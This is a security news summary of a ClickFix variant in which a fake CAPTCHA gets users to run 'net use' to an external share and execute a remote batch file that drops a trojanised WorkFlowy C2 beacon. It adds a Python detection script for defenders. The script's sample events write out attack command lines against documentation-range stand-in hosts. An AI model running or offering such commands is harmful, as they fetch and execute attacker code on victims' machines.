Investigating a New Click-Fix Variant
Briefly

"Atos researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a "net use" command is used to map a network drive from an external server, after which a ".cmd" batch file hosted on that drive is executed."
"The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside an ".asar" archive. This acts as a C2 beacon and a dropper for the final malware payload."
"Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that "net use" is being used to map and connect to a network drive of an external server from which a Batch script is executed."
A new ClickFix attack variant has been identified that uses a fake CAPTCHA webpage to trick users into executing commands via Win+R. The pasted command runs net use to map a share on an external server as a network drive, then executes a batch file from that drive. The batch file downloads and unpacks a ZIP archive containing the legitimate WorkFlowy application with malicious logic embedded in its .asar archive; the modified application functions as a command-and-control (C2) beacon and as a dropper for the final malware payload. The net use step is the distinguishing indicator: earlier ClickFix chains relied on PowerShell or mshta for payload delivery, whereas here an interactive SMB mapping to an external host, followed by a script run from that mapped drive, carries the next stage.
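The chain above (net use to an external share, then a .cmd or .bat run from the mapped drive or directly from the UNC path) is visible in ordinary process-creation telemetry. The following is an added detection example written for this summary, not code from Atos or The Hacker News. It correlates constructed Sysmon Event ID 1 style records per user: a net use that maps a drive letter to a share on a host outside the internal ranges, followed within a time window by cmd.exe executing a batch file from that drive, or a batch file launched straight from an external UNC path. The internal network ranges, the internal DNS suffixes, the window length, the field names and the sample events are all assumptions for the example; the 203.0.113.x and 198.51.100.x addresses are RFC 5737 documentation addresses standing in for attacker hosts.

```python
import ipaddress
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields); not real telemetry.
# alice: two-step Win+R chain; bob: benign mapping of an internal file server;
# carol: batch file run straight from an external UNC path; dave: the whole chain on one line.
SAMPLE_EVENTS = [
    {"ts": 100, "user": "CORP\\alice", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net use Z: \\\\203.0.113.10\\share /user:guest x"},
    {"ts": 104, "user": "CORP\\alice", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd /c Z:\\setup.cmd"},
    {"ts": 200, "user": "CORP\\bob", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net use P: \\\\fileserver.corp.local\\public"},
    {"ts": 205, "user": "CORP\\bob", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd /c P:\\tools\\login.bat"},
    {"ts": 300, "user": "CORP\\carol", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd /c \\\\198.51.100.7\\drop\\run.cmd"},
    {"ts": 400, "user": "CORP\\dave", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd /c net use Q: \\\\203.0.113.44\\pub & Q:\\update.cmd"},
]

# Assumed internal address space and DNS suffixes; adjust to the environment being monitored.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_SUFFIXES = (".corp.local", ".local")

# "net use [X:] \\host\share" with an optional drive letter (net.exe or net1.exe).
NET_USE_RE = re.compile(r'\bnet1?(?:\.exe)?"?\s+use\s+(?:([a-z]):\s+)?(\\\\[^\\\s"]+\\[^\s"]*)', re.I)
# A .cmd/.bat path rooted at a drive letter or a UNC host.
BATCH_RE = re.compile(r'((?:[a-z]:|\\\\[^\\\s"]+)\\[^\s"]*\.(?:cmd|bat))\b', re.I)
UNC_HOST_RE = re.compile(r"^\\\\([^\\\s]+)\\")


def is_external_host(host, internal_suffixes=INTERNAL_SUFFIXES):
    """True when the share host is neither an internal address nor an internal name."""
    host = host.lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Single-label names resolve on the LAN (DNS suffix search / NetBIOS); treat as internal.
        return "." in host and not host.endswith(internal_suffixes)
    return not any(ip in net for net in INTERNAL_NETS)


def detect(events, window=600):
    """Return alerts for batch files executed from shares on external hosts.

    A drive letter mapped by `net use` is remembered per user for `window` seconds,
    so a later script launch from that letter is attributed to the mapped host.
    """
    mappings = {}   # (user, drive letter) -> (timestamp, host)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        cmdline = ev["cmdline"]
        # Record any mapping first: a one-line "net use ... & X:\run.cmd" contains both steps.
        m = NET_USE_RE.search(cmdline)
        if m:
            drive, unc = m.group(1), m.group(2)
            if drive:
                mappings[(ev["user"], drive.upper())] = (ev["ts"], UNC_HOST_RE.match(unc).group(1))
        b = BATCH_RE.search(cmdline)
        if not b:
            continue
        script = b.group(1)
        if script.startswith("\\\\"):
            host = UNC_HOST_RE.match(script).group(1)          # executed directly from the share
        else:
            mapped = mappings.get((ev["user"], script[0].upper()))
            if not mapped or ev["ts"] - mapped[0] > window:
                continue                                        # local drive or stale mapping
            host = mapped[1]
        if is_external_host(host):
            alerts.append({
                "user": ev["user"], "ts": ev["ts"], "host": host, "script": script,
                # Win+R launches have explorer.exe as the parent; a useful secondary signal.
                "from_run_dialog": ev["parent"].lower().endswith("\\explorer.exe"),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The mapping table is keyed per user and expires after the window, so a script launched from a drive letter that a different user mapped, or that was mapped hours earlier, is not attributed to the external host. Because the host is resolved at the time of the net use rather than at script execution, the rule still fires when the share is unmapped immediately after the batch file starts.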
Read at The Hacker News